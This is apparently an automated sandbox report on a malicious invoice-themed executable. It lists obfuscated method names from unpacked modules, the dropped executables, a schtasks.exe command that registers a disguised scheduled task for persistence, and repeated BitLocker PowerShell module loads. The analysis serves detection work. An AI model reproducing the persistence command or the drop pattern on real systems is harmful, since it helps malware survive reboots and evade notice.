Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, yCeDlVgAMNcmLpGwhR.cs	High entropy of concatenated method names: 'JnreMjKFqt', 'fGteHiA2VP', 'U0KeggwwDa', 'x0leiHefTb', 'VLVe8lFx6G', 'ktFemK035a', 'oSdeT5aIB0', 'SfAeNCIQPg', 'k09efnpRMC', 'Gi9e7OubcZ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, WB2CDbBBEQ3jaYNbceU.cs	High entropy of concatenated method names: 'kw5CEsheEI', 'l5dCzwYX40', 'QH6wF7Hego', 'EnwwBJabvL', 'qpSwWbt2l1', 'JvjwrfipUA', 'UKdw6PZqiX', 'fivwj4iCgi', 'GRmwDMGr6w', 'zo4wJPbphB'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, wXsvMXJCHjMi9vLlvj.cs	High entropy of concatenated method names: 'Dispose', 'Jd3BuLOjQi', 'NyIW8Wx4YQ', 'bDx5Tl12hB', 'r1vBEc9uVe', 'xyxBz1lMfE', 'ProcessDialogKey', 'dqiWF9uGs2', 'sgmWBAZ9Iv', 'lgmWWbtaSv'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, DvmcHVB6n0qi7M2DNOu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DKo3dH4CTL', 'ggN3C60GtG', 'aJM3w8ZvmO', 'nPM330tKrj', 'GUw30vDaZj', 'sBN3SgA7pw', 'k2f31Xdjn8'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, Eg85B0hasNd3LOjQid.cs	High entropy of concatenated method names: 'jr0deGUXLZ', 'GigdxMXI5J', 'd3addtJLD3', 'KYldw6YmrT', 'arEd02YAQx', 'i2jd1tO7W1', 'Dispose', 'HdyIDGy7Um', 'iGwIJLJkHr', 'OrlIvFAKd0'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, O6WdmkTllo2NrEaC1d.cs	High entropy of concatenated method names: 'M7vK1fsmuS', 'CIPKQamWr6', 'XFyK2QfrLY', 'BWiKoYbD0A', 'y4OKXZLP7a', 'RV0KtxlQIT', 'hXpKZ9Oclv', 'GFnKGdJD0D', 't5e48P1mM00Qt4kSSZ3', 'LkxeV11jaZ56pWIH6VQ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, alS5Omz1n5JRLlj1xe.cs	High entropy of concatenated method names: 'c2CCXXPsG4', 'VA3Cy9cYJV', 'CgICZ75BSL', 'Vb9CRtMKuw', 'p7dC82n2Px', 'DlACT97pZE', 'vBTCNodZLF', 'MvBC1tm1mb', 'XfPCQqXcGG', 'WjhCOlrwx3'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, pAwOSccCkIKjIJFW2E.cs	High entropy of concatenated method names: 'bDOsQbGkNn', 'LaesO9waQq', 'uDPs20K0Hl', 'wSusoYJnUj', 'e23sUu6IPH', 'slssXhMBka', 'OYRstsDZCo', 's7bsyvlqEg', 'g7fsZPNLWJ', 'r7usGEExqc'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, DRPuPZ6e0aRXF0B0Mr.cs	High entropy of concatenated method names: 'OMVBse2suw', 'wDrBnHA5V0', 'LgoBPhQtTe', 'JBNBpacuUT', 'wlHBej4QwE', 'P9hBl6Yb2D', 'k8K5Hf5Po9XmJCcU3K', 'aivcqRR5nJWQuMn1q6', 'P4MBBBoquA', 'vZNBrcKhR4'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, LukFP34Rn5NIOZ6yCt.cs	High entropy of concatenated method names: 'UKOxV9Lsp0', 'sduxERspIr', 'jMeIFyutRI', 'cE2IBksqbj', 'KHOx9qX1Ah', 'u0nxHZARBB', 'TfKxkBbqJw', 'H6kxgXCpF6', 'FVkxiqaCTp', 'oLHxLPU7u5'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, iCGdh7ZgohQtTeNBNa.cs	High entropy of concatenated method names: 'M0YvoX88gf', 'SkFvXiW7fj', 'HNxvyp8klK', 'VDGvZ1BWTp', 'eK5vesjJch', 'dSFvlJp6jw', 'JJ8vxu0Sk8', 'FDcvIyQU1e', 'pIWvdlrOrv', 't46vCLIAGN'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, E065RLkbqKxfw5yYer.cs	High entropy of concatenated method names: 'lUBqyYhygY', 'qTWqZNyqRI', 'TfhqRCeoGu', 'BsWq8g1aPn', 'G2tqTXPUse', 'PExqN2H8vt', 'Abuq7Gkqfa', 'b03qadpCA8', 'vcyqMjKlLM', 'pHfq93crwU'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, ywEH9hR6Yb2DfJk8aH.cs	High entropy of concatenated method names: 'C71KjojMRH', 'tOFKJDUTNn', 'sxiKA96Xgv', 'cW2KsILjJr', 'dInKnulWKS', 'VCCA5LtskU', 'bkSA4E5VZJ', 'KYJAh7CLAN', 'nrXAV1CsUP', 'gYEAuYM8W5'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, PPffK2BFqHRlcfG5DXL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4yC9n0xhy', 'VNZCHAf1VB', 'sLJCkmZvI8', 'vNmCgloC8O', 'IGhCiv1KnF', 'oiJCLTQIOE', 'Q7ICYo1EXM'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, ltaSvVEAcXYXCnSQQZ.cs	High entropy of concatenated method names: 's6KCvJC2dC', 'iBKCAHTsWv', 'IAXCKA0BV8', 'ECFCsWoTSw', 'Ya5CdFCwCd', 'sL9CnB5YoM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, We2suwySDrHA5V0J8S.cs	High entropy of concatenated method names: 'XHPJgYJXxP', 'EnrJiR8Ei8', 'dwgJLS0Iik', 'EMGJYqovY4', 'OT0J5aXkVH', 'UUkJ4c9hbR', 'SJdJhTu1DA', 'QjyJVdqWAO', 'rhbJu9Hcr1', 'vc6JEbWElO'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	High entropy of concatenated method names: 'xndrjoWAG9', 'heIrDXHrFr', 'CiLrJ2P2HW', 'W92rvNIRAJ', 'kGIrAQtvKh', 'XTvrKhgF5U', 'tvTrsY3mdZ', 'b5rrnHYsQ9', 'hNRrbJfp5g', 'incrP75ihW'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, i72jdQWIGF4xNdxNWv.cs	High entropy of concatenated method names: 'J8Z27M3T4', 'PdaoYr3Eh', 'ThwXiIpIQ', 'pubtFkRKI', 'StSZvDSpC', 'K3HG8jLwR', 'mvbgHLb4pAPYRB7sXn', 'tGrKo123utTamCYIEl', 'ik0IMywfG', 'ILkCqhUNr'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, MuUTAGGlguXe31lHj4.cs	High entropy of concatenated method names: 'dfIAUxKOth', 'AfBAtOOPC3', 'eDpvm9tfNs', 'jLgvTMQ0T3', 't5nvNtnOQN', 'TKevfkGIwK', 'uEFv7YZfAb', 'u5nvaMemAZ', 'MJ9vcN0SIa', 'vijvMYLZNJ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, mnHCNM7PwmKJlRW83L.cs	High entropy of concatenated method names: 'jHwsDTyg1u', 'SR0svqUdPb', 'ih5sKo7hVb', 'STdKEbUrHg', 'jHOKzNHBKf', 'rkPsFmppuU', 'tVjsB4SNxx', 'O7MsWnRQyq', 'J0osrwBUKL', 'c3ks6ELu90'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, R9uGs2uCgmAZ9Ivbgm.cs	High entropy of concatenated method names: 'cIKdRfWFHs', 'CsTd8q2mCc', 'JSodmiT6qt', 'fTHdTbCuCS', 'sukdN6mt38', 'UPZdf2UaOT', 'Wlmd7cWZIL', 'mpPdaeOROm', 'lqQdciqLBN', 'DCddMA8M92'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, yCeDlVgAMNcmLpGwhR.cs	High entropy of concatenated method names: 'JnreMjKFqt', 'fGteHiA2VP', 'U0KeggwwDa', 'x0leiHefTb', 'VLVe8lFx6G', 'ktFemK035a', 'oSdeT5aIB0', 'SfAeNCIQPg', 'k09efnpRMC', 'Gi9e7OubcZ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, WB2CDbBBEQ3jaYNbceU.cs	High entropy of concatenated method names: 'kw5CEsheEI', 'l5dCzwYX40', 'QH6wF7Hego', 'EnwwBJabvL', 'qpSwWbt2l1', 'JvjwrfipUA', 'UKdw6PZqiX', 'fivwj4iCgi', 'GRmwDMGr6w', 'zo4wJPbphB'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, wXsvMXJCHjMi9vLlvj.cs	High entropy of concatenated method names: 'Dispose', 'Jd3BuLOjQi', 'NyIW8Wx4YQ', 'bDx5Tl12hB', 'r1vBEc9uVe', 'xyxBz1lMfE', 'ProcessDialogKey', 'dqiWF9uGs2', 'sgmWBAZ9Iv', 'lgmWWbtaSv'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, DvmcHVB6n0qi7M2DNOu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DKo3dH4CTL', 'ggN3C60GtG', 'aJM3w8ZvmO', 'nPM330tKrj', 'GUw30vDaZj', 'sBN3SgA7pw', 'k2f31Xdjn8'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, Eg85B0hasNd3LOjQid.cs	High entropy of concatenated method names: 'jr0deGUXLZ', 'GigdxMXI5J', 'd3addtJLD3', 'KYldw6YmrT', 'arEd02YAQx', 'i2jd1tO7W1', 'Dispose', 'HdyIDGy7Um', 'iGwIJLJkHr', 'OrlIvFAKd0'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, O6WdmkTllo2NrEaC1d.cs	High entropy of concatenated method names: 'M7vK1fsmuS', 'CIPKQamWr6', 'XFyK2QfrLY', 'BWiKoYbD0A', 'y4OKXZLP7a', 'RV0KtxlQIT', 'hXpKZ9Oclv', 'GFnKGdJD0D', 't5e48P1mM00Qt4kSSZ3', 'LkxeV11jaZ56pWIH6VQ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, alS5Omz1n5JRLlj1xe.cs	High entropy of concatenated method names: 'c2CCXXPsG4', 'VA3Cy9cYJV', 'CgICZ75BSL', 'Vb9CRtMKuw', 'p7dC82n2Px', 'DlACT97pZE', 'vBTCNodZLF', 'MvBC1tm1mb', 'XfPCQqXcGG', 'WjhCOlrwx3'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, pAwOSccCkIKjIJFW2E.cs	High entropy of concatenated method names: 'bDOsQbGkNn', 'LaesO9waQq', 'uDPs20K0Hl', 'wSusoYJnUj', 'e23sUu6IPH', 'slssXhMBka', 'OYRstsDZCo', 's7bsyvlqEg', 'g7fsZPNLWJ', 'r7usGEExqc'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, DRPuPZ6e0aRXF0B0Mr.cs	High entropy of concatenated method names: 'OMVBse2suw', 'wDrBnHA5V0', 'LgoBPhQtTe', 'JBNBpacuUT', 'wlHBej4QwE', 'P9hBl6Yb2D', 'k8K5Hf5Po9XmJCcU3K', 'aivcqRR5nJWQuMn1q6', 'P4MBBBoquA', 'vZNBrcKhR4'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, LukFP34Rn5NIOZ6yCt.cs	High entropy of concatenated method names: 'UKOxV9Lsp0', 'sduxERspIr', 'jMeIFyutRI', 'cE2IBksqbj', 'KHOx9qX1Ah', 'u0nxHZARBB', 'TfKxkBbqJw', 'H6kxgXCpF6', 'FVkxiqaCTp', 'oLHxLPU7u5'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, iCGdh7ZgohQtTeNBNa.cs	High entropy of concatenated method names: 'M0YvoX88gf', 'SkFvXiW7fj', 'HNxvyp8klK', 'VDGvZ1BWTp', 'eK5vesjJch', 'dSFvlJp6jw', 'JJ8vxu0Sk8', 'FDcvIyQU1e', 'pIWvdlrOrv', 't46vCLIAGN'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, E065RLkbqKxfw5yYer.cs	High entropy of concatenated method names: 'lUBqyYhygY', 'qTWqZNyqRI', 'TfhqRCeoGu', 'BsWq8g1aPn', 'G2tqTXPUse', 'PExqN2H8vt', 'Abuq7Gkqfa', 'b03qadpCA8', 'vcyqMjKlLM', 'pHfq93crwU'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, ywEH9hR6Yb2DfJk8aH.cs	High entropy of concatenated method names: 'C71KjojMRH', 'tOFKJDUTNn', 'sxiKA96Xgv', 'cW2KsILjJr', 'dInKnulWKS', 'VCCA5LtskU', 'bkSA4E5VZJ', 'KYJAh7CLAN', 'nrXAV1CsUP', 'gYEAuYM8W5'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, PPffK2BFqHRlcfG5DXL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4yC9n0xhy', 'VNZCHAf1VB', 'sLJCkmZvI8', 'vNmCgloC8O', 'IGhCiv1KnF', 'oiJCLTQIOE', 'Q7ICYo1EXM'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, ltaSvVEAcXYXCnSQQZ.cs	High entropy of concatenated method names: 's6KCvJC2dC', 'iBKCAHTsWv', 'IAXCKA0BV8', 'ECFCsWoTSw', 'Ya5CdFCwCd', 'sL9CnB5YoM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, We2suwySDrHA5V0J8S.cs	High entropy of concatenated method names: 'XHPJgYJXxP', 'EnrJiR8Ei8', 'dwgJLS0Iik', 'EMGJYqovY4', 'OT0J5aXkVH', 'UUkJ4c9hbR', 'SJdJhTu1DA', 'QjyJVdqWAO', 'rhbJu9Hcr1', 'vc6JEbWElO'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	High entropy of concatenated method names: 'xndrjoWAG9', 'heIrDXHrFr', 'CiLrJ2P2HW', 'W92rvNIRAJ', 'kGIrAQtvKh', 'XTvrKhgF5U', 'tvTrsY3mdZ', 'b5rrnHYsQ9', 'hNRrbJfp5g', 'incrP75ihW'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, i72jdQWIGF4xNdxNWv.cs	High entropy of concatenated method names: 'J8Z27M3T4', 'PdaoYr3Eh', 'ThwXiIpIQ', 'pubtFkRKI', 'StSZvDSpC', 'K3HG8jLwR', 'mvbgHLb4pAPYRB7sXn', 'tGrKo123utTamCYIEl', 'ik0IMywfG', 'ILkCqhUNr'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, MuUTAGGlguXe31lHj4.cs	High entropy of concatenated method names: 'dfIAUxKOth', 'AfBAtOOPC3', 'eDpvm9tfNs', 'jLgvTMQ0T3', 't5nvNtnOQN', 'TKevfkGIwK', 'uEFv7YZfAb', 'u5nvaMemAZ', 'MJ9vcN0SIa', 'vijvMYLZNJ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, mnHCNM7PwmKJlRW83L.cs	High entropy of concatenated method names: 'jHwsDTyg1u', 'SR0svqUdPb', 'ih5sKo7hVb', 'STdKEbUrHg', 'jHOKzNHBKf', 'rkPsFmppuU', 'tVjsB4SNxx', 'O7MsWnRQyq', 'J0osrwBUKL', 'c3ks6ELu90'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, R9uGs2uCgmAZ9Ivbgm.cs	High entropy of concatenated method names: 'cIKdRfWFHs', 'CsTd8q2mCc', 'JSodmiT6qt', 'fTHdTbCuCS', 'sukdN6mt38', 'UPZdf2UaOT', 'Wlmd7cWZIL', 'mpPdaeOROm', 'lqQdciqLBN', 'DCddMA8M92'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, yCeDlVgAMNcmLpGwhR.cs	High entropy of concatenated method names: 'JnreMjKFqt', 'fGteHiA2VP', 'U0KeggwwDa', 'x0leiHefTb', 'VLVe8lFx6G', 'ktFemK035a', 'oSdeT5aIB0', 'SfAeNCIQPg', 'k09efnpRMC', 'Gi9e7OubcZ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, WB2CDbBBEQ3jaYNbceU.cs	High entropy of concatenated method names: 'kw5CEsheEI', 'l5dCzwYX40', 'QH6wF7Hego', 'EnwwBJabvL', 'qpSwWbt2l1', 'JvjwrfipUA', 'UKdw6PZqiX', 'fivwj4iCgi', 'GRmwDMGr6w', 'zo4wJPbphB'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, wXsvMXJCHjMi9vLlvj.cs	High entropy of concatenated method names: 'Dispose', 'Jd3BuLOjQi', 'NyIW8Wx4YQ', 'bDx5Tl12hB', 'r1vBEc9uVe', 'xyxBz1lMfE', 'ProcessDialogKey', 'dqiWF9uGs2', 'sgmWBAZ9Iv', 'lgmWWbtaSv'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, DvmcHVB6n0qi7M2DNOu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DKo3dH4CTL', 'ggN3C60GtG', 'aJM3w8ZvmO', 'nPM330tKrj', 'GUw30vDaZj', 'sBN3SgA7pw', 'k2f31Xdjn8'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, Eg85B0hasNd3LOjQid.cs	High entropy of concatenated method names: 'jr0deGUXLZ', 'GigdxMXI5J', 'd3addtJLD3', 'KYldw6YmrT', 'arEd02YAQx', 'i2jd1tO7W1', 'Dispose', 'HdyIDGy7Um', 'iGwIJLJkHr', 'OrlIvFAKd0'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, O6WdmkTllo2NrEaC1d.cs	High entropy of concatenated method names: 'M7vK1fsmuS', 'CIPKQamWr6', 'XFyK2QfrLY', 'BWiKoYbD0A', 'y4OKXZLP7a', 'RV0KtxlQIT', 'hXpKZ9Oclv', 'GFnKGdJD0D', 't5e48P1mM00Qt4kSSZ3', 'LkxeV11jaZ56pWIH6VQ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, alS5Omz1n5JRLlj1xe.cs	High entropy of concatenated method names: 'c2CCXXPsG4', 'VA3Cy9cYJV', 'CgICZ75BSL', 'Vb9CRtMKuw', 'p7dC82n2Px', 'DlACT97pZE', 'vBTCNodZLF', 'MvBC1tm1mb', 'XfPCQqXcGG', 'WjhCOlrwx3'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, pAwOSccCkIKjIJFW2E.cs	High entropy of concatenated method names: 'bDOsQbGkNn', 'LaesO9waQq', 'uDPs20K0Hl', 'wSusoYJnUj', 'e23sUu6IPH', 'slssXhMBka', 'OYRstsDZCo', 's7bsyvlqEg', 'g7fsZPNLWJ', 'r7usGEExqc'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, DRPuPZ6e0aRXF0B0Mr.cs	High entropy of concatenated method names: 'OMVBse2suw', 'wDrBnHA5V0', 'LgoBPhQtTe', 'JBNBpacuUT', 'wlHBej4QwE', 'P9hBl6Yb2D', 'k8K5Hf5Po9XmJCcU3K', 'aivcqRR5nJWQuMn1q6', 'P4MBBBoquA', 'vZNBrcKhR4'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, LukFP34Rn5NIOZ6yCt.cs	High entropy of concatenated method names: 'UKOxV9Lsp0', 'sduxERspIr', 'jMeIFyutRI', 'cE2IBksqbj', 'KHOx9qX1Ah', 'u0nxHZARBB', 'TfKxkBbqJw', 'H6kxgXCpF6', 'FVkxiqaCTp', 'oLHxLPU7u5'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, iCGdh7ZgohQtTeNBNa.cs	High entropy of concatenated method names: 'M0YvoX88gf', 'SkFvXiW7fj', 'HNxvyp8klK', 'VDGvZ1BWTp', 'eK5vesjJch', 'dSFvlJp6jw', 'JJ8vxu0Sk8', 'FDcvIyQU1e', 'pIWvdlrOrv', 't46vCLIAGN'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, E065RLkbqKxfw5yYer.cs	High entropy of concatenated method names: 'lUBqyYhygY', 'qTWqZNyqRI', 'TfhqRCeoGu', 'BsWq8g1aPn', 'G2tqTXPUse', 'PExqN2H8vt', 'Abuq7Gkqfa', 'b03qadpCA8', 'vcyqMjKlLM', 'pHfq93crwU'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, ywEH9hR6Yb2DfJk8aH.cs	High entropy of concatenated method names: 'C71KjojMRH', 'tOFKJDUTNn', 'sxiKA96Xgv', 'cW2KsILjJr', 'dInKnulWKS', 'VCCA5LtskU', 'bkSA4E5VZJ', 'KYJAh7CLAN', 'nrXAV1CsUP', 'gYEAuYM8W5'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, PPffK2BFqHRlcfG5DXL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4yC9n0xhy', 'VNZCHAf1VB', 'sLJCkmZvI8', 'vNmCgloC8O', 'IGhCiv1KnF', 'oiJCLTQIOE', 'Q7ICYo1EXM'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, ltaSvVEAcXYXCnSQQZ.cs	High entropy of concatenated method names: 's6KCvJC2dC', 'iBKCAHTsWv', 'IAXCKA0BV8', 'ECFCsWoTSw', 'Ya5CdFCwCd', 'sL9CnB5YoM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, We2suwySDrHA5V0J8S.cs	High entropy of concatenated method names: 'XHPJgYJXxP', 'EnrJiR8Ei8', 'dwgJLS0Iik', 'EMGJYqovY4', 'OT0J5aXkVH', 'UUkJ4c9hbR', 'SJdJhTu1DA', 'QjyJVdqWAO', 'rhbJu9Hcr1', 'vc6JEbWElO'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	High entropy of concatenated method names: 'xndrjoWAG9', 'heIrDXHrFr', 'CiLrJ2P2HW', 'W92rvNIRAJ', 'kGIrAQtvKh', 'XTvrKhgF5U', 'tvTrsY3mdZ', 'b5rrnHYsQ9', 'hNRrbJfp5g', 'incrP75ihW'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, i72jdQWIGF4xNdxNWv.cs	High entropy of concatenated method names: 'J8Z27M3T4', 'PdaoYr3Eh', 'ThwXiIpIQ', 'pubtFkRKI', 'StSZvDSpC', 'K3HG8jLwR', 'mvbgHLb4pAPYRB7sXn', 'tGrKo123utTamCYIEl', 'ik0IMywfG', 'ILkCqhUNr'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, MuUTAGGlguXe31lHj4.cs	High entropy of concatenated method names: 'dfIAUxKOth', 'AfBAtOOPC3', 'eDpvm9tfNs', 'jLgvTMQ0T3', 't5nvNtnOQN', 'TKevfkGIwK', 'uEFv7YZfAb', 'u5nvaMemAZ', 'MJ9vcN0SIa', 'vijvMYLZNJ'
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, mnHCNM7PwmKJlRW83L.cs	High entropy of concatenated method names: 'jHwsDTyg1u', 'SR0svqUdPb', 'ih5sKo7hVb', 'STdKEbUrHg', 'jHOKzNHBKf', 'rkPsFmppuU', 'tVjsB4SNxx', 'O7MsWnRQyq', 'J0osrwBUKL', 'c3ks6ELu90'

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	File created: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	File created: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	File created: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	File created: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
